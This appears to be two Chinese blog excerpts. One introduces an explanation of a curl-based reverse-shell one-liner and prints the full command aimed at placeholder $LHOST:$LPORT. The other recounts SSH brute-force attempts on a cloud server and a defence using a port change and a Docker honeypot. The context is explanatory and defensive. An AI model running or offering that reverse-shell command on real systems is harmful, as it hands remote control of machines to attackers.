本文简要解释了神奇的 curl 反弹 shell 命令 { curl -sNkT . https://$LHOST:$LPORT &-;} 3>&1|: 的工作原理。

忽然收到腾讯云的报警短信，说是检测到来自某IP的异常登录行为，疑似被黑客入侵。于是我马上登录服务器，查看SSH登录失败日志，发现果然有人在暴力破解我的SSH用户名和密码。排查发现，20几天里有一千多个IP进行了一万多次的登录尝试。攻击真的无处不在。我修改了SSH端口号并部署了一个基于docker的蜜罐来抵御这种攻击。